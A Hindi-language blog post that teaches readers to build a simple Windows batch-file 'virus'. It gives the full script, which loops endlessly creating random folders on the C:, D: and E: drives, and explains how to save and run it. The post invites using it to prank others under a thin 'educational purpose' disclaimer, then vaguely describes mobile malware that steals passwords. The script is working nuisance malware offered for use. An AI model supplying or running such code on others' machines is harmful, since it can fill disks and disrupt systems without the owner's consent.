वायरस कैसे बनाये और कम्प्यूटर में रन कैसे करे

पिछली पोस्ट में मैंने बताया की वायरस क्या है और वायरस कितने प्रकार के होते है। अगर वो पोस्ट आपने पढ़ा है तो वायरस की पूरी जानकारी आपको समझ आ गयी होगी। आज उसी पोस्ट के बेस पर एक सिंपल वायरस बनाना सिखाऊंगा। वैसे कम्प्यूटर को हैक करने के लिए या ऑपरेटिंग सिस्टम को बिगाड़ने के लिए बहुत से वायरस बनाये जा सकते है लेकिन यहाँ पर में सिर्फ एक आसान और छोटा वायरस बनाने के बारे में बताउगा जिससे आपको हमारे Educational Purpose द्वारा समझ आ जाये की असली वायरस बनता कैसे है।

virus kaise banaye

दोस्तों पोस्ट को स्टार्ट करने से पहले ही बता दू की यह virus trick सिर्फ आपको एजुकेशन के लिए बता रहा हु। अगर आपको इसे यूज़ कर के किसी के साथ मज़ाक करना है तो कर सकते है लेकिन इसका गलत इस्तेमाल करने के बारे में बिलकुल भी ना सोचे।

कंप्यूटर वायरस कैसे बनाये

  • सबसे पहले अपने कंप्यूटर में नोटपेड ओपन करे।
  • नोटपैड को ओपन करने के बाद निचे दिए हुए कोड को फुल कॉपी कर लीजिये और नोटपैड में पेस्ट कर दीजिये।

@echo off

:VIRUS

cd /d C:

md %RANDOM%

cd /d D:

md %RANDOM%

cd /d E:

md %RANDOM%

goto VIRUS

  • अब ctrl+s दबा कर फाइल को सेव करे, फाइल को .bat के नाम से सेव करे। (यहाँ हम बैच फाइल का वायरस बना रहे है।
  • बस इतना करते ही आपकी प्रोसेस पूरी हो चुकी है और वायरस बन कर तैयार है।
  • फाइल को क्लोज करे और डबल क्लिक कर के फिर से ओपन करे।
  • मैजिक ! ओपन पर क्लिक करते ही आप देखेंगे की एक साथ बहुत सारे फ़ोल्डर्स अपने आप ही ऑटोमेटिकली क्रिएट होते जा रहे है और यह रुकने का नाम ही नहीं ले रहे।
  • अब फिर से सब पहला जैसा ठीक करने के लिए सारे फ़ोल्डर्स को सेलेक्ट करे या ctrl+A पर क्लिक करे और फिर ctrl+D पर क्लिक करे all delete कर दीजिये।
  • फोल्डर के बाद अपनी वायरस फाइल .bat को भी डिलीट कर दीजिये।

वायरस हैकिंग कैसे करते है (Mobile Virus)

यहाँ पर आपने देखा की एक छोटी सी वायरस फाइल पर क्लिक करने से कैसे पूरी कंप्यूटर में वायरस ने आटोमेटिक काम करना स्टार्ट कर दिया। यह तो अच्छी बात है यह वायरस दिख रहा था लेकिन हैकर जो वायरस बनाते है वो दीखते नहीं है सिर्फ महसूस होते है जैसे की आपने कोई इमेज डाउनलोड किया और उसे ओपन करते ही मोबाइल में अलग अलग फाइल का पासवर्ड पूछा जाता है। यही वो तरीका है जहा से आपकी इनफार्मेशन या मोबाइल हैक हो जाता है।

3 साल पहले पक्का सोल्युशन के ओल्ड वर्शन वेबसाइट को जब स्टार्ट किया था तब से लेकर आज तक इंटरनेट पर हैकिंग के बारे में सबसे ज्यादा जानकारी हमने दी है। तो हम यह न्यू वर्शन वेबसाइट में आगे भी फिर से हैकिंग के बारे में बहुत सी जानकारी शेयर करने वाले है, हमारे साथ कनेक्ट रहने के लिए ब्लॉग को सब्सक्राइब करे। मिलते है अपनी नेक्स्ट पोस्ट में तब तक टेक केयर।

DAWAiLAJ
Logo